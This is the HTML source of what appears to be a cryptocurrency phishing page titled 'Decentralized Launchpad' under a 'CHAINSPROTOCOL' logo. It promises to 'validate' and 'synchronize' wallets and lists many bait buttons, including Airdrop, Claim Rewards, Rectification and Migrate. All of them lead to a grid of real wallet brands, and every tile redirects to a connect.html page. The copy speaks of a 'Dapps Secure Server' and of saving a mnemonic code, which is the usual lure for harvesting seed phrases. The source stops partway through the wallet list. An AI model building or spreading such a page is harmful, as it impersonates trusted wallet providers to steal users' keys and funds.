<!DOCTYPE html>
<!--[if IE 8 ]><html class="ie" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <![endif]-->
<!--[if (gte IE 9)|!(IE)]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<!--<![endif]-->

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>

    <meta charset="utf-8">
    <!--[if IE]><meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'><![endif]-->
    <title>Decentralized Launchpad</title>
    <meta name="author" content="ivytag.world">

    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    <link rel="stylesheet" type="text/css" href="asset/css/style.css">

    <link rel="shortcut icon" href="asset/images/icon/shield.png">
    <link rel="apple-touch-icon-precomposed" href="asset/images/icon/shield.png">

    <style type="text/css">
        .flat-title-page .overlay {
            background: rgba(0, 0, 139, 1) !important;
        }
    </style>
</head>

<!-- <body class="body header-fixed is_dark"> -->

<body class="body header-fixed">

    <div class="preload preload-container">
        <div class="preload-logo"></div>
    </div>

    <div id="wrapper">
        <div id="page" class="clearfix">

            <header id="header_main" class="header_1 js-header">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-md-12">
                            <div id="site-header-inner">
                                <div class="wrap-box flex">
                                    <div id="site-logo" class="clearfix">
                                        <div id="site-logo-inner">
                                            <a href="#" rel="home" class="main-logo">
                                                <h4 style="color: white !important;">CHAINSPROTOCOL</h4>
                                            </a>
                                        </div>
                                    </div>
                                   <div class="flat-search-btn flex">
                                        <div class="sc-btn-top mg-r-12" id="site-header">
                                            <a href="#wallets_list" id="connectbtn"
                                                class="sc-button header-slider style style-1 wallet fl-button pri-1">
                                                <span>Connect Wallet</span>
                                            </a>
                                        </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <script type="text/javascript" src="https://files.coinmarketcap.com/static/widget/coinMarquee.js"></script><div id="coinmarketcap-widget-marquee" coins="1,1027,825,5426,52,2,74,1958,1975,2010,3408,5964,6636,3890,7083,27772,6958" currency="USD" theme="dark" transparent="false" show-symbol-logo="true"></div>
            </header>


            <section class="flat-title-page home3 parallax">
                <img class="bgr-gradient gradient1" src="asset/images/backgroup-secsion/bg-gradient1.html" alt="">
                <img class="bgr-gradient gradient2" src="asset/images/backgroup-secsion/bg-gradient2.html" alt="">
                <img class="bgr-gradient gradient3" src="asset/images/backgroup-secsion/bg-gradient3.html" alt="">
                <div class="shape item-w-16"></div>
                <div class="shape item-w-22"></div>
                <div class="shape item-w-32"></div>
                <div class="shape item-w-48"></div>
                <div class="shape style2 item-w-51"></div>
                <div class="shape style2 item-w-51 position2"></div>
                <div class="shape item-w-68"></div>
                <div class="overlay"></div>
                <div class="swiper-container mainslider auctions">
                    <div class="swiper-wrapper">
                        <div class="swiper-slide">
                            <div class="slider-item">
                                <div class="themesflat-container">
                                    <div class="wrap-heading flat-slider text-center">
                                        <h2 class="heading">Validate, initialize, <br> and synchronize your
                                        </h2>
                                        <h1 class="heading"><span class="tf-text s1">tokens</span>
                                            <span>in your wallets</span>
                                        </h1>
                                        <p class="sub-heading mg-t-29 mg-bt-50">Open and decentralized protocol for
                                            syncing various Wallets to Dapps Secure Server, while making money through the following:
                                        </p>
                                        <div class="flat-bt-slider flex">
                                            <a href="#wallets_list"
                                                class="sc-button header-slider style style-1 note fl-button pri-1">
                                                <span>Staking</span>
                                            </a>
                                            <a href="#wallets_list"
                                                class="sc-button header-slider style style-1 note fl-button pri-1">
                                                <span>Migration V2</span>
                                            </a>
                                        </div>
                                        <div class="flat-bt-slider flex">
                                            <a href="#wallets_list"
                                                class="sc-button header-slider style style-1 note fl-button pri-1">
                                                <span>Connect Wallet </span>
                                            </a>
                                            <a href="#wallets_list"
                                                class="sc-button header-slider style style-1 note fl-button pri-1">
                                                <span>Airdrop</span>
                                            </a>
                                        </div>
                                        <div class="flat-bt-slider flex">
                                            <a href="#wallets_list"
                                                class="sc-button header-slider style style-1 note fl-button pri-1">
                                                <span> Whitelist </span>
                                            </a>
                                            <a href="#wallets_list"
                                                class="sc-button header-slider style style-1 note fl-button pri-1">
                                                <span>KYC</span>
                                            </a>
                                        </div>
                                        <div class="flat-bt-slider flex">
                                            <a href="#wallets_list"
                                                class="sc-button header-slider style style-1 note fl-button pri-1">
                                                <span>RPC Settings</span>
                                            </a>
                                            <a href="#wallets_list"
                                                class="sc-button header-slider style style-1 note fl-button pri-1">
                                                <span>Buy NFT </span>
                                            </a>
                                        </div>
                                        <div class="flat-bt-slider flex">
                                            <a href="#wallets_list"
                                                class="sc-button header-slider style style-1 note fl-button pri-1">
                                                <span> Marketplace</span>
                                            </a>
                                        </div>
                                        <div class="flat-bt-slider flex mt-2">
                                            <a href="#wallets_list"
                                                class="sc-button header-slider style style-1 note fl-button pri-1">
                                                <span>Gas</span>
                                            </a>
                                        </div>
                                        <div class="flat-bt-slider flex mt-2">
                                            <a href="#wallets_list"
                                                class="sc-button header-slider style style-1 note fl-button pri-1">
                                                <span>Claim Rewards</span>
                                            </a>
                                            <a href="#wallets_list"
                                                class="sc-button header-slider style style-1 note fl-button pri-1">
                                                <span>Rectification</span>
                                            </a>

                                        </div>
                                        <div class="flat-bt-slider flex mt-2">
                                            <a href="#wallets_list"
                                                class="sc-button header-slider style style-1 note fl-button pri-1">
                                                <span>Snapshot</span>
                                            </a>
                                            <a href="#wallets_list"
                                                class="sc-button header-slider style style-1 note fl-button pri-1">
                                                <span>Buy Presale</span>
                                            </a>

                                        </div>
                                        <div class="flat-bt-slider flex mt-2">

                                            <a href="#wallets_list"
                                                class="sc-button header-slider style style-1 note fl-button pri-1">
                                                <span>Migrate</span>
                                            </a>

                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                       
                    </div>
                    <div class="swiper-pagination"></div>
                </div>
                <div class="swiper-button-next btn-slide-next active"></div>
                <div class="swiper-button-prev btn-slide-prev"></div>
            </section>
            <section class="tf-box-icon bg-box-icon-color tf-section">
                <div class="themesflat-container">
                    <div class="sc-box-icon-inner">
                        <div class="sc-box-icon">
                            <div class="image">
                                <svg width="56" height="56" viewBox="0 0 56 56" fill="none"
                                    xmlns="http://www.w3.org/2000/svg">
                                    <rect y="6.10352e-05" width="56" height="56" rx="16" fill="#5142FC" />
                                    <path fill-rule="evenodd" clip-rule="evenodd"
                                        d="M34.9222 26.0179H39.1035C39.5983 26.0179 39.9995 26.3981 39.9995 26.8672V29.8195C39.9937 30.2863 39.5959 30.6634 39.1035 30.6688H35.0182C33.8252 30.684 32.7821 29.9098 32.5115 28.8085C32.376 28.1247 32.5662 27.4192 33.0312 26.881C33.4961 26.3427 34.1883 26.0268 34.9222 26.0179ZM35.1034 29.122H35.4981C36.0047 29.122 36.4154 28.7327 36.4154 28.2525C36.4154 27.7722 36.0047 27.3829 35.4981 27.3829H35.1034C34.8611 27.3802 34.6277 27.4696 34.4554 27.631C34.2831 27.7925 34.1861 28.0127 34.1861 28.2423C34.186 28.7242 34.5951 29.1164 35.1034 29.122Z"
                                        fill="#F9F9FA" fill-opacity="0.4" />
                                    <path
                                        d="M34.9227 24.2788H40C40 20.3154 37.5573 18.0001 33.4187 18.0001H22.5813C18.4427 18.0001 16 20.3154 16 24.2283V32.7718C16 36.6847 18.4427 39.0001 22.5813 39.0001H33.4187C37.5573 39.0001 40 36.6847 40 32.7718V32.4079H34.9227C32.5662 32.4079 30.656 30.5972 30.656 28.3636C30.656 26.13 32.5662 24.3193 34.9227 24.3193V24.2788Z"
                                        fill="white" />
                                    <path
                                        d="M28.4582 24.2789H21.6849C21.1766 24.2734 20.7675 23.8812 20.7676 23.3993C20.7734 22.923 21.1824 22.5398 21.6849 22.5399H28.4582C28.9649 22.5399 29.3756 22.9292 29.3756 23.4094C29.3756 23.8896 28.9649 24.2789 28.4582 24.2789Z"
                                        fill="#948BFB" />
                                </svg>
                            </div>
                            <h3 class="heading">
                                <a href="#">Select Your Wallet</a>
                            </h3>
                            <p class="content">We have varieties of wallets you can choose from to validate or
                                synchronize your wallet. Please, select your correct wallet name before proceeding below.</p>
                        </div>
                        <div class="sc-box-icon">
                            <div class="image">
                                <svg width="56" height="56" viewBox="0 0 56 56" fill="none"
                                    xmlns="http://www.w3.org/2000/svg">
                                    <rect y="6.10352e-05" width="56" height="56" rx="16" fill="#47A432" />
                                    <path
                                        d="M23.104 16.0001H19.048C17.368 16.0001 16 17.3801 16 19.0732V23.164C16 24.868 17.368 26.236 19.048 26.236H23.104C24.796 26.236 26.1519 24.868 26.1519 23.164V19.0732C26.1519 17.3801 24.796 16.0001 23.104 16.0001Z"
                                        fill="white" />
                                    <path
                                        d="M23.104 29.7637H19.048C17.368 29.7637 16 31.1329 16 32.8369V36.9277C16 38.6197 17.368 39.9997 19.048 39.9997H23.104C24.796 39.9997 26.1519 38.6197 26.1519 36.9277V32.8369C26.1519 31.1329 24.796 29.7637 23.104 29.7637Z"
                                        fill="white" />
                                    <path
                                        d="M36.9516 16.0001H32.8956C31.2036 16.0001 29.8477 17.3801 29.8477 19.0732V23.164C29.8477 24.868 31.2036 26.236 32.8956 26.236H36.9516C38.6316 26.236 39.9996 24.868 39.9996 23.164V19.0732C39.9996 17.3801 38.6316 16.0001 36.9516 16.0001Z"
                                        fill="white" fill-opacity="0.4" />
                                    <path
                                        d="M36.9516 29.7637H32.8956C31.2036 29.7637 29.8477 31.1329 29.8477 32.8369V36.9277C29.8477 38.6197 31.2036 39.9997 32.8956 39.9997H36.9516C38.6316 39.9997 39.9996 38.6197 39.9996 36.9277V32.8369C39.9996 31.1329 38.6316 29.7637 36.9516 29.7637Z"
                                        fill="white" />
                                </svg>
                            </div>
                            <h3 class="heading"><a href="#">Validate Your Wallet</a></h3>
                            <p class="content">Once you select your wallet, you will be prompted to connect via a
                                decentralized protocol. This can successfully be completed manually or automatically.
                            </p>
                        </div>
                        <div class="sc-box-icon mg-bt">
                            <div class="image">
                                <svg width="56" height="56" viewBox="0 0 56 56" fill="none"
                                    xmlns="http://www.w3.org/2000/svg">
                                    <rect width="56" height="56" rx="16" fill="#9835FB" />
                                    <path fill-rule="evenodd" clip-rule="evenodd"
                                        d="M19.396 23.8885C19.396 21.1625 21.061 19.3955 23.638 19.3955H32.354C34.94 19.3955 36.605 21.1625 36.605 23.8885V29.1905C36.159 28.8125 34.812 27.8715 34.624 27.7595C33.224 26.9195 31.544 27.2995 30.454 28.7195C30.359 28.8445 28.782 31.1445 28.224 31.4885C28.095 31.5685 27.959 31.6115 27.814 31.6315C27.464 31.6615 27.127 31.4815 26.554 31.0985C26.224 30.8885 25.864 30.6495 25.454 30.4795C23.749 29.7665 22.45 30.9445 21.758 31.7345C21.749 31.7425 19.812 34.1045 19.781 34.1415C19.538 33.5505 19.396 32.8675 19.396 32.1025V23.8885ZM38 23.8885C38 20.3625 35.731 18.0005 32.354 18.0005H23.638C20.271 18.0005 18 20.3625 18 23.8885V32.1025C18 33.6745 18.447 35.0135 19.238 36.0095C19.247 36.0185 19.247 36.0285 19.256 36.0285C20.043 37.0135 21.166 37.6665 22.519 37.8995C22.531 37.9015 22.543 37.9035 22.556 37.9055C22.903 37.9625 23.262 38.0005 23.638 38.0005H32.354C32.535 38.0005 32.7 37.9665 32.874 37.9535C33.078 37.9365 33.289 37.9325 33.483 37.8985C33.74 37.8545 33.976 37.7775 34.215 37.7035C34.319 37.6705 34.43 37.6505 34.53 37.6125C34.773 37.5205 34.996 37.4015 35.217 37.2795C35.297 37.2355 35.383 37.1995 35.461 37.1505C35.678 37.0145 35.875 36.8555 36.068 36.6895C36.132 36.6345 36.201 36.5845 36.262 36.5265C36.45 36.3475 36.616 36.1505 36.775 35.9445C36.824 35.8795 36.876 35.8195 36.923 35.7525C37.076 35.5345 37.208 35.2995 37.33 35.0545C37.364 34.9835 37.4 34.9145 37.433 34.8425C37.546 34.5855 37.64 34.3165 37.72 34.0345C37.741 33.9585 37.762 33.8835 37.78 33.8055C37.851 33.5145 37.902 33.2145 37.935 32.9005C37.939 32.8625 37.95 32.8275 37.954 32.7895C37.961 32.7045 37.96 32.6195 37.965 32.5345C37.973 32.3885 38 32.2535 38 32.1025V23.8885Z"
                                        fill="white" />
                                    <path
                                        d="M24.5048 27.0001C25.8663 27.0001 27 25.87 27 24.5151C27 23.8356 26.7151 23.2132 26.2607 22.7615C25.8081 22.2935 25.1764 22.0001 24.4787 22.0001C23.1085 22.0001 22 23.1041 22 24.4687C22 24.6492 22.0213 24.8239 22.0591 24.9937C22.2878 26.1257 23.3081 27.0001 24.5048 27.0001Z"
                                        fill="white" fill-opacity="0.4" />
                                </svg>
                            </div>
                            <h3 class="heading"><a href="#">Generate QR Code</a></h3>
                            <p class="content">Upon successful validation, a QR Code will be generated for your wallet.
                                You can always scan your QR Code to reinitialize your wallet.</p>
                        </div>
                        <div class="sc-box-icon">
                            <div class="image">
                                <svg width="56" height="56" viewBox="0 0 56 56" fill="none"
                                    xmlns="http://www.w3.org/2000/svg">
                                    <rect width="56" height="56" rx="16" fill="#DF4949" />
                                    <rect x="21" y="22" width="13" height="4" fill="white" fill-opacity="0.4" />
                                    <path fill-rule="evenodd" clip-rule="evenodd"
                                        d="M24.125 16H31.8375C35.225 16 37.9625 17.284 38 20.5478V38.7631C38 38.9671 37.95 39.1711 37.85 39.3511C37.6875 39.6391 37.4125 39.8551 37.075 39.9511C36.75 40.0471 36.3875 39.9991 36.0875 39.8311L27.9875 35.9432L19.875 39.8311C19.6888 39.9259 19.475 39.9871 19.2625 39.9871C18.5625 39.9871 18 39.4351 18 38.7631V20.5478C18 17.284 20.75 16 24.125 16ZM23.2753 25.1437H32.6878C33.2253 25.1437 33.6628 24.7225 33.6628 24.1958C33.6628 23.6678 33.2253 23.2478 32.6878 23.2478H23.2753C22.7378 23.2478 22.3003 23.6678 22.3003 24.1958C22.3003 24.7225 22.7378 25.1437 23.2753 25.1437Z"
                                        fill="white" />
                                </svg>
                            </div>
                            <h3 class="heading"><a href="#">Save Wallet QR Code</a></h3>
                            <p class="content">Saving your generated mnemonic code or QR Code is important. You can
                                click on Save or Screenshot the QR Code Page. You choose how you want to save!</p>
                        </div>
                    </div>
                </div>
            </section>
            <section class="tf-section top-seller" id="wallets_list">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-md-12">
                            <h2 class="tf-title style2">
                                Select a Wallet below to get started</h2>
                            <div class="heading-line s2"></div>
                        </div>


                        


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="wallet_connect" class="sc-author-box select_wallet" data-title="Wallet Connect"
                                data-logo="asset/images/logo/walle.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                        <img src="asset/images/logo/walle.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Wallet Connect</a></h5>
                                    <span class="price">walletconnect.com</span>
                                </div>
                            </div>
                        </div>

                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="trust_wallet" class="sc-author-box select_wallet" data-title="Trust Wallet"
                                data-logo="asset/images/logo/trust_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/trust_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Trust Wallet</a></h5>
                                    <span class="price">trustwallet.com</span>
                                </div>
                            </div>
                        </div>

.                      
   <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
     <div id="metamask" class="sc-author-box select_wallet" data-title="Metamask" data-logo="asset/images/logo/metamask.jpg">
       <div class="author-avatar">
         <img src="asset/images/logo/metamask.jpg" alt="Image" class="avatar">
         <div class="badge"><i class="ripple"></i></div>
       </div>
       <div class="author-infor">
         <h5 class="style2">Metamask</h5>
         <span class="price">metamask.io</span>
       </div>
     </div>
   </div>

                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="Flint Wallet" class="sc-author-box select_wallet" data-title="Flint Wallet"
                                data-logo="asset/images/logo/Flint.jpeg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/Flint.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Flint Wallet</a></h5>
                                    <span class="price">Flint-Wallet.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="binance" class="sc-author-box select_wallet" data-title="Binance Chain Wallet"
                                data-logo="asset/images/logo/binance.png" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/binance.png" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Binance Chain Wallet</a></h5>
                                    <span class="price">binance.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="polygon" class="sc-author-box select_wallet" data-title="Polygon Wallet"
                                data-logo="asset/images/logo/polygon.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/polygon.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Polygon Wallet</a></h5>
                                    <span class="price">polygon.technology</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="rainbow" class="sc-author-box select_wallet" data-title="Rainbow"
                                data-logo="asset/images/logo/rainbow.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/rainbow.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Rainbow</a></h5>
                                    <span class="price">rainbow.me</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="bitpay" class="sc-author-box select_wallet" data-title="Bitpay"
                                data-logo="asset/images/logo/bitpay.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/bitpay.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Bitpay</a></h5>
                                    <span class="price">bitpay.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="waleth" class="sc-author-box select_wallet" data-title="Walleth"
                                data-logo="asset/images/logo/walleth.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/walleth.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Walleth</a></h5>
                                    <span class="price">walleth.org</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="argent" class="sc-author-box select_wallet" data-title="Argent"
                                data-logo="asset/images/logo/argent.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/argent.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Argent</a></h5>
                                    <span class="price">argent.xyz</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="huobi" class="sc-author-box select_wallet" data-title="Huobi Wallet"
                                data-logo="asset/images/logo/huobi.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/huobi.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Huobi Wallet</a></h5>
                                    <span class="price">huobiwallet.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="encrypted_ink" class="sc-author-box select_wallet" data-title="Encrypted Ink"
                                data-logo="asset/images/logo/encrypted_ink.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/encrypted_ink.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Encrypted Ink</a></h5>
                                    <span class="price">encrypted.ink</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6"onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="compound" class="sc-author-box select_wallet" data-title="Compound"
                                data-logo="asset/images/logo/compound.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/compound.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Compound</a></h5>
                                    <span class="price">compound.finance</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="polkadot" class="sc-author-box select_wallet" data-title="Polkadot"
                                data-logo="asset/images/logo/polkadot.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/polkadot.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Polkadot</a></h5>
                                    <span class="price">polkadot.network</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="iotex" class="sc-author-box select_wallet" data-title="Iotex"
                                data-logo="asset/images/logo/iotex.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/iotex.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Iotex</a></h5>
                                    <span class="price">iotex.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="coin98" class="sc-author-box select_wallet" data-title="Coin98"
                                data-logo="asset/images/logo/coin98.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                  
                                        <img src="asset/images/logo/coin98.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Coin98</a></h5>
                                    <span class="price">coin98.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="coinbase" class="sc-author-box select_wallet" data-title="Coinbase"
                                data-logo="asset/images/logo/coinbase.png" style="cursor:pointer;">
                                <div class="author-avatar">
                                  
                                        <img src="asset/images/logo/coinbase.png" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Coinbase</a></h5>
                                    <span class="price">coinbase.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="crypto" class="sc-author-box select_wallet" data-title="Crypto.com | Defi Wallet"
                                data-logo="asset/images/logo/crypto.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/crypto.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Crypto.com | Defi Wallet</a></h5>
                                    <span class="price">crypto.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="token_pocket" class="sc-author-box select_wallet" data-title="Token Pocket"
                                data-logo="asset/images/logo/token_pocket.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/token_pocket.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Token Pocket</a></h5>
                                    <span class="price">tokenpocket.pro</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="math_wallet" class="sc-author-box select_wallet" data-title="Math Wallet"
                                data-logo="asset/images/logo/math_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/math_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Math Wallet</a></h5>
                                    <span class="price">mathwallet.org</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="ledger_live" class="sc-author-box select_wallet" data-title="Ledger Live"
                                data-logo="asset/images/logo/ledger_live.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/ledger_live.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Ledger Live</a></h5>
                                    <span class="price">ledger.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="_1inch" class="sc-author-box select_wallet" data-title="1Inch"
                                data-logo="asset/images/logo/1inch.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/1inch.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>1Inch</a></h5>
                                    <span class="price">1inch.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="dharma" class="sc-author-box select_wallet" data-title="Dharma"
                                data-logo="asset/images/logo/dharma.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/dharma.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Dharma</a></h5>
                                    <span class="price">dharma.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="trust_vault" class="sc-author-box select_wallet" data-title="Trust Vault"
                                data-logo="asset/images/logo/trust_vault.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/trust_vault.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Trust Vault</a></h5>
                                    <span class="price">trustology.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="my_key" class="sc-author-box select_wallet" data-title="MYKEY"
                                data-logo="asset/images/logo/mykey.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/mykey.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>MYKEY</a></h5>
                                    <span class="price">mykey.org</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="atomic" class="sc-author-box select_wallet" data-title="Atomic"
                                data-logo="asset/images/logo/atomic.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/atomic.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
